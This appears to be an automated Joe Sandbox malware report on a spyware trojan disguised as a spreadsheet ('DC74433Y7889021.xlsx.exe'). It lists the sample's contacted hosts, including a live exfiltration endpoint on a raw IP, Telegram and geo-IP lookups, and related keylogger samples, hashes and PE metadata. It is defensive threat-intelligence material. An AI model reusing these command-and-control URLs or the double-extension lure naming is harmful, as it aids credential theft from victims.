                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comDC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedDC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://reallyfreegeoip.org/xml/DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                149.154.167.220
                                		api.telegram.orgUnited Kingdom
                                		62041TELEGRAMRUtrue
                                188.114.97.3
                                		reallyfreegeoip.orgEuropean Union
                                		13335CLOUDFLARENETUStrue
                                193.122.130.0
                                		checkip.dyndns.comUnited States
                                		31898ORACLE-BMC-31898USfalse
                                213.189.52.181
                                		s4.serv00.comPoland
                                		57367ECO-ATMAN-PLECO-ATMAN-PLtrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1474973
                                Start date and time:2024-07-17 14:16:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 21s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:DC74433Y7889021.xlsx.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/1@4/4
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 110
                                • Number of non-executed functions: 19
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: DC74433Y7889021.xlsx.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:17:00API Interceptor5612498x Sleep call for process: DC74433Y7889021.xlsx.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                149.154.167.220172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                  EHOsLAUB7J.rtfGet hashmaliciousSnake KeyloggerBrowse
                                    PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                      QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        Ekpb7jn7mf.exeGet hashmaliciousRedLine, XWormBrowse
                                          Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              bodrum_buro.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                Proforma fatura.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  New order 01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    188.114.97.3Quotation.xlsGet hashmaliciousRemcosBrowse
                                                    • gurl.pro/fycglx
                                                    New Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.coinwab.com/efdt/
                                                    PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • gurl.pro/
                                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.29500.322.rtfGet hashmaliciousLokibotBrowse
                                                    • rocheholding.top/rudolph/five/fre.php
                                                    Ykyu6uvfyD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 193046cm.nyashka.top/externaleternal_pollpacketLongpollapitestUploads.php
                                                    am.exeGet hashmaliciousAmadeyBrowse
                                                    • downloaddining2.com/h9fmdW6/index.php
                                                    Purchase Order -JJ023639PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/0I42Eqo4/download
                                                    NAtK3GR95V.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 949542cm.nyashka.top/externaldefaultprivate.php
                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                    • www.coinwab.com/efdt/
                                                    http://d705v.crent365.comGet hashmaliciousUnknownBrowse
                                                    • d705v.crent365.com/
                                                    193.122.130.0PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    z92PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    SecuriteInfo.com.Win64.PWSX-gen.3492.24691.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    Shipping Docs PO#QSB-8927393_2324, QSB-8927394_23-24.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    1e2e668213a67dba5e1a30cd974a8a80a9623137fd1abdbf8a18770f25ad1172_dump.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    DOCUMENT_10-07-2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    c3cddff3ce93f42d93f3134e6c55eec6f0e75f25256ed91b5d8a6e90cecaf8cc_dump.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    SecuriteInfo.com.Trojan.AutoIt.1161.27360.18045.exeGet hashmaliciousVIP KeyloggerBrowse
                                                    • checkip.dyndns.org/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    reallyfreegeoip.org172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    EHOsLAUB7J.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    DS0987656789000JHG.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    Project Inquiry & Drawings .exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    SecuriteInfo.com.W32.MSIL_Kryptik.IUH.gen.Eldorado.32665.13080.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    z92PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    checkip.dyndns.com172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 132.226.8.169
                                                    EHOsLAUB7J.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    DS0987656789000JHG.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    Project Inquiry & Drawings .exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    Comprobante de pago_978989689..exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 132.226.8.169
                                                    QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 193.122.6.168
                                                    Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 132.226.8.169
                                                    SecuriteInfo.com.W32.MSIL_Kryptik.IUH.gen.Eldorado.32665.13080.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    s4.serv00.comPRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 213.189.52.181
                                                    Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 213.189.52.181
                                                    api.telegram.org172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    EHOsLAUB7J.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    Ekpb7jn7mf.exeGet hashmaliciousRedLine, XWormBrowse
                                                    • 149.154.167.220
                                                    Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    bodrum_buro.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    Proforma fatura.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    New order 01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TELEGRAMRU172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    file.exeGet hashmaliciousVidarBrowse
                                                    • 149.154.167.99
                                                    v993SRbY3C.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    ynZemxI36h.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    rqdYnT5Mf1.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    UwC67bObmD.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    6a27NdesoV.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    x9H6bdbO7l.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    A9bmuy3JZX.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    8hgsOdkeUa.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.99
                                                    CLOUDFLARENETUStest1.vbsGet hashmaliciousUnknownBrowse
                                                    • 104.20.56.117
                                                    document.vbsGet hashmaliciousUnknownBrowse
                                                    • 104.20.56.117
                                                    attachment (3).emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    Quotation.xlsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    https://ap3x.adj.st/?adjust_t=q604b4&adjust_deeplink=mrdfood://&adjust_engagement_type=fallback_click&adjust_fallback=https://2d840152.dsihjdskihsdjkisdhjsdkhhjbsd2o0289uij.pages.dev/#?email=bGN1c2hpbmdAc2F2YXJpYS5jb20=Get hashmaliciousUnknownBrowse
                                                    • 104.17.2.184
                                                    botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 104.18.34.214
                                                    de15f973-51dc-4d3c-9fe0-6b94dd765028.emlGet hashmaliciousUnknownBrowse
                                                    • 172.67.189.23
                                                    botx.x86.elfGet hashmaliciousMiraiBrowse
                                                    • 104.18.212.112
                                                    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                                    • 188.114.96.3
                                                    Pour votre information (216Ko).msgGet hashmaliciousUnknownBrowse
                                                    • 104.18.142.119
                                                    ORACLE-BMC-31898USEHOsLAUB7J.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    Project Inquiry & Drawings .exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    PO026037.docx.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                                                    • 193.122.193.58
                                                    QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 193.122.6.168
                                                    SecuriteInfo.com.W32.MSIL_Kryptik.IUH.gen.Eldorado.32665.13080.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    z92PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.130.0
                                                    z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                    • 193.122.130.0
                                                    bodrum_buro.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 158.101.44.242
                                                    ECO-ATMAN-PLECO-ATMAN-PLhttps://skposta.serv00.net/Get hashmaliciousUnknownBrowse
                                                    • 128.204.223.100
                                                    PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 213.189.52.181
                                                    BOQ_Algeemi_SharePoint_Tender_3768889756.xksx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 91.185.189.19
                                                    http://10f4cf3.wcomhost.com/Get hashmaliciousUnknownBrowse
                                                    • 85.194.241.205
                                                    Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 213.189.52.181
                                                    BOQ_Algeemi_SharePoint_Tender.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 91.185.189.19
                                                    OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                                    • 31.186.83.254
                                                    Invoice_23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                                                    • 31.186.83.248
                                                    WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                                                    • 77.79.227.218
                                                    WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                                                    • 77.79.227.218

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    54328bd36c14bd82ddaa0c04b25ed9ad172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    DS0987656789000JHG.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    test.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    Project Inquiry & Drawings .exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.97.3
                                                    Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    SecuriteInfo.com.W32.MSIL_Kryptik.IUH.gen.Eldorado.32665.13080.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    z92PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 188.114.97.3
                                                    3b5074b1b5d032e5620f69f9f700ff0ehttps://dl.dropboxusercontent.com/scl/fi/amk8gyukhso9fnawmzyn5/rechnung-juli2024.zip?rlkey=ys40hkxopm2rk8nb3por1hahy&st=rv9g5p7z&dl=0Get hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    Delivery Certificate.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 149.154.167.220
                                                    https://zohoinvoicepay.com/invoice/horizonhivesholdings/secure?CInvoiceID=2-5d1a6e6e7fc02c6aa9c16ba084eaf7b11969e250db6bf56b3ff921885bb1a02a1de112985005752c6b386aa74f5531aa4b7fa92bbb84e57e4955efe41be6b38898e1fb71080bbb7a%20Get hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    Docs_BL INV PKL.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 149.154.167.220
                                                    wzjEaheCBP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                    • 149.154.167.220
                                                    172120861797cb5313eab8cb4c994d23e3cb7a93b70368549aa2aed0ee600798a18aef00cd503.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    img_Zam#U00f3wienie - #20240716-A09461_pdf.com.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 149.154.167.220
                                                    Inquiry no. 2024-1981.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 149.154.167.220
                                                    v993SRbY3C.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.220
                                                    ynZemxI36h.exeGet hashmaliciousRedLineBrowse
                                                    • 149.154.167.220

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DC74433Y7889021.xlsx.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.5283500998100426
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:DC74433Y7889021.xlsx.exe
                                                    File size:739'328 bytes
                                                    MD5:6fd5c95f3bc8ac876f1babed1b839dcd
                                                    SHA1:b35d7e77ac643ab5d9bbe7442553aa82ac1379c3
                                                    SHA256:d1fcbf364ad31af81a9612d9633e1b6598375983354390bfaa32b5ea5a7c3a6d
                                                    SHA512:13215e1e1252953b6db6e4a13c9ae438579e3873eb780ef5038d9d32a4452812e9e5b29f4ad24033c30310d621d86077ec937a1805497be74c5181b99f8019cd
                                                    SSDEEP:12288:c4ndmoie6MfHpYRK7raPRJeoqN0N40AxLqA:pngpe6m2R3PPeoqN0N4Jq
                                                    TLSH:F5F4C01A2A60C879ED3D95B6F4E3402D2B307D4225E2E93714CE3E8C6AF9B5145C726F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0......Z........... ... ....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:31d89a929298d027

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4b0a1e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xA8818C66 [Sat Aug 2 15:06:14 2059 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb09d00x4b.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x5784.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
